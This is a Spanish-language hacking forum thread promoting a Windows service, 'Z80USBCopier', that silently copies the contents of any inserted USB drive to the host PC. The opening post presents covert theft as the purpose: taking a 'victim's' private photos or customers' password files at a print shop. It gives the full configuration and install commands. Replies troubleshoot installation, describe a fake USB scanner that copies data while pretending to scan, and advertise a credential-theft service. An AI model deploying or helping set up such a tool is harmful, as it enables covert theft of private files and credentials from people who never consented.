Silent USB Copy, Roba datos de USBs que se conectan a tu PC

Iniciado por 79137913, Agosto 03, 2017, 01:11:22 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

HOLA!!!

Zilog80 USB 'silent' USB copier

#1) Que hace?
Z80USBCopier es un Servicio de Windows que copia la informacion en discos insertados a tu HDD.

#2) Ejemplos de Uso
Ejemplo #1:
Imaginate que alguien te pide imprimir algo, Insertas el USB de tu amigo(o victima  ;D) y la PC automaticamente empieza a copiar todo a tu HDD.
Imaginate que tiene en el usb la siguiente carpeta E:\Vacaciones\2016\Ibiza\Pacha\Hot\wtf_0001.jpgE:\Vacaciones\2016\Ibiza\Pacha\Hot\wtf_0002.jpg,  ... (espero que entiendas)
Sin que tu "amigo" sepa que copiaste esas fotos.

Ejemplo #2:
Tenes una libreria o lugar donde la gente vaya a imprimir cosas y uno de los usb que copiaste tiene lo siguiente: E:\Audio\RollingStones\Album Desconocido\Pista1\accountPasswords.txt
Que pensas que es  accountPasswords.txt? JAJAJA

Ejemplo #3:
Tenes tu propio USB y sin querer lo formateas o le pasa algo,tenes un "backup" en tu pc ;)

#3) Como funciona?
Es un servicio de windows, no necesita ningun tipo de interaccion.



Se maneja el funcionamiento dentro de el archivo Config.ini que esta bien comentado y es facil de modificar.
Config INI:

Código: php
; Z80 USB Copier config file

[Extensions]
; Si CopyAnyExtensionFile=1 se copian todos los archivos y CopyOnlyFilesWithExtension es omitido
CopyAnyExtensionFile=0
CopyOnlyFilesWithExtension=accdb,avi,bmp,css,dll,doc,docx,exe,gif,htm,html,ico,ini,jpeg,jpg,log,mdb,mov,mp3,mp4,msi,ogg,pdf,png,rar,sql,txt,wav,xls,xlsx,xps,zip

; Ejemplos de Extensiones:
; Imagenes:
;CopyOnlyFilesWithExtension=bmp,gif,ico,jpeg,jpg,png
; Documentos:
;CopyOnlyFilesWithExtension=accdb,doc,docx,mdb,pdf,txt,xls,xlsx,xps
; Ejecutables y Comprimidos:
;CopyOnlyFilesWithExtension=exe,msi,rar,zip
; Audio y Video:
;CopyOnlyFilesWithExtension=avi,mov,mp3,mp4,ogg,wav,wma

[SizeLimit]
; CopyAnySize=0 copia solo el intervalo entre MinSize y MaxSize 1=Se copian todos los tamaños y se omiten MinSize / MaxSize
CopyAnySize=0
; Sufijos: B (bytes), KB (KiloBytes), MB (MegaBytes)
MinSize=0B   
MaxSize=10MB

[DestinationFolder]
; Se copiara a la carpeta que este especificada, %ApplicationStartupPath% es la carpeta donde se instalo el sistema.
; Tambien podes poner una carpeta especifica: C:\carpeta1\carpeta2
RootFolder=%ApplicationStartupPath%
; If you are copying J:\ USB the hierarchy will be:
; RootFolder\yyyyMMdd\HHmmss_J\
;RemoveEmptyFolders=0 al terminar de copiar no hace nada, 1= al terminar de copiar busca carpetas vacias y las borra de la carpeta de destino
RemoveEmptyFolders=0

[ExculdeCopyDrives]
; Excluded=0(todos los discos se copiaran) 1=los discos en la variable Drives se excluiran.
Excluded=0
Drives=E,G,J

[Debug]
; Values=0 (no hace logs) 1=hace un log en RootFolder\yyyyMMdd\HHmmss_X_log.txt con los archivos salteados
SaveSkippedToLog=1


#4) Cuanto tarda?
Depende si es un USB un disco externo o es un cd, pero aqui una prueba: USB 1.0, 80 MB (196 archivos y 19 carpetas/subcarpetas) de USB a HDD ( no SSD) toma 20 segundos (Windows 10)

#5) Como lo instalo?
En el comprimido tenes todo lo que necesitas
1)descomprimis en la carpeta donde quieras que quede (es importante saber que el servicio se instalara ahi y no lo podras sacar, por ende no lo instales en el escritorio por ejemplo)
2)abris un CMD con privilegios de Administrador y navegas a la carpeta que descomprimiste.
3) tipeas estos comandos:

Código: php

installutil.exe Z80USBCopier.exe
net start Z80USBSvc


P.D: es necesario que tengan instalado NET FRAMEWORK 4

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

A disfrutar!

Gracias a Zilog80

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos

Seguí el tutorial y no me funcionó. Tengo Windows 7 Starter, 32bits.

Tengo instalado correctamente el Net Framework 4. Incluso lo desintalé e instalé de nuevo el Net Framework.

Aquí te muestro el error:

... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

HOLA!!!

Intenta seguir esta guia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.

Espero tu aporte.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aplica para móviles android?

HOLA!!!

Siempre y cuando se monten con una unidad de letra basica (es decir a: b: c: d: e: f: g: etc) se copiaran los archivos.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
Espero tu aporte y explición de su funcionamiento mi amigo  ;)

Youtube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Octubre 03, 2017, 06:28:29 AM #7 Ultima modificación: Octubre 03, 2017, 06:37:09 AM por DinamicoBoys
Lo probare, acabo de pasarlo por  viruscheckmate , parece estar bien limpio,  a probar en una maquina con el AV que deseo :)

Les dejo el link --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

EDIT: Joder necesito privilegios de administrador y no tengo la contraseña :v .. ademas que usa kaspersky, por eso no me sirve el resto de archivos que tengo..

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.

saludos.
hola, prodrias resubir la app por favor?

Hola! excelente aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
a la hora de escribir los comandos me sale este error:

¿Qué debo hacer?
Muchas gracias.

HOLA!!!

instala la última versión de net framework.

Con eso debería andar

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

excelente me funciono a la perfeccion en windows 7 ultimate de 64 bits , windows 8.1 pro  y windows 10 enterprite , por cierto el amigo de la deepweb  no subira el aporte xD

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Hola!
sigue sin funcionarme, me muestra el mismo error. Alguna solución??
Tengo windows 10 creators update, la última...
saludos

HOLA!!!

Es extraño, no lo he testeado en ese so pero debería funcionar, tenes privilegios de administrador? La cmd que abris tiene privilegios de administrador? Revisa eso.


GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Es extraño, no lo he testeado en ese so pero debería funcionar, tenes privilegios de administrador? La cmd que abris tiene privilegios de administrador? Revisa eso.


GRACIAS POR LEER!!!


Hola de nuevo @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , sí he iniciado la consola con privilegios de administrador. También he buscado información sobre el error pero no encuentro nada para solucionarlo...
Gracias!

En este artículo explico la misma juagada pero bajo Linux utilizando reglas udev:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que sirva ;)